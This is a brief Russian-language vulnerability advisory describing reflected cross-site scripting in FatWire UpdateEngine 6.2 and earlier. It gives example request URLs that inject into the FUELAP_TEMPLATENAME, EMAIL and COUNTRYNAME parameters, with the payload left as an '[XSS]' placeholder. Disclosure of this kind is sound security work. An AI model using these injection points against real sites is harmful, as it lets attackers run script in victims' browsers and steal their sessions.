Программа: FatWire UpdateEngine 6.2 и более ранние версии
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметрах
"FUELAP_TEMPLATENAME", "EMAIL" и "COUNTRYNAME" в "UpdateEngine". Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный код сценария в браузере жертвы в контексте безопасности уязвимого
сайта.
Пример:
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID= FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D66&ACTIVITY_ID=FWS5FWHITEPAPERS%5F1404733&
COUNTRY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5F
PAGE%5F1415379&FUELAP_TEMPLATENAME=[XSS]
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=
fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=
[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5F
WHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELAP _SITEDBID=SITE%5F%2D66&
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME =fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&
EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN
TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT EPAPERS%5F1300483&COUNTRYNAME=[XSS]
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_ TEMPLATENAME=[XSS]
